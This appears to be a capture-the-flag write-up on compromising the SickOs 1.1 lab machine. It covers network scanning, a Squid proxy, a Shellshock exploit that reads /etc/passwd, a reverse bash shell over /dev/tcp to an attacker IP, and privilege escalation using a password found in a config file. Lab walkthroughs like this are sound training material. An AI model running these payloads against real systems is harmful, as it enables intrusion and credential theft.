sickos:1.1

From Vulhub

Tools:

  • netdiscover
  • Nmap
  • Metasploit
  • FoxyProxy

Use netdiscover to detect target IP address

netdiscover -i eth0 -r 192.168.79.0/24

192.168.79.178 is the target.

Then run nmap to detect opening ports and running services on the target machine.

nmap -sV -v -O -A -T5 192.168.79.178 -p-

Looks like port 22 and port 3218 are openning. Port 3218 is running Squid. open msfconsole, search squid. I found that:

Then use this module to scan the squid service:

Looks like port 80 is opened:

Use FoxyProxy add-on to configure proxy:

now visit http://192.168.79.178

now let’s use nikto to scan the server:

1

nikto -h localhost -useproxy http://192.168.79.178:3128

looks like there is a shellshock vuln

Let’s test it:

1

wget -q -O- -U "() { test;};echo \"content-type: text/plain\"; echo; echo; /bin/cat /etc/passwd" -e use_proxy=on -e http_proxy=192.168.79.178:3128 "http://192.168.79.178/cgi-bin/status"

It works and looks there is an account sickos.

Now lets setup reverse shell.

netcat-style shell access without netcat:

/bin/bash -i > /dev/tcp/[yourip]/[port] 0<&1

in one terminal:

nc -nlvp 4444

in another terminal:

1

wget -q -O- -U "() { test;};echo \"content-type: text/plain\"; echo; echo; /bin/bash -i > /dev/tcp/192.168.79.173/4444 0<&1" -e use_proxy=on -e http_proxy=192.168.79.178:3128 "http://192.168.79.178/cgi-bin/status"

get the shell:

After Enumeration, got a interesting file: /var/www/wolfcms/config.php

Looks like the password is john@123

SSH to the target server as sickos and use this password:

Check sickos’s privilege:

sudo -l

Looks like it can run as root

YES

shellshock, squid, vulhub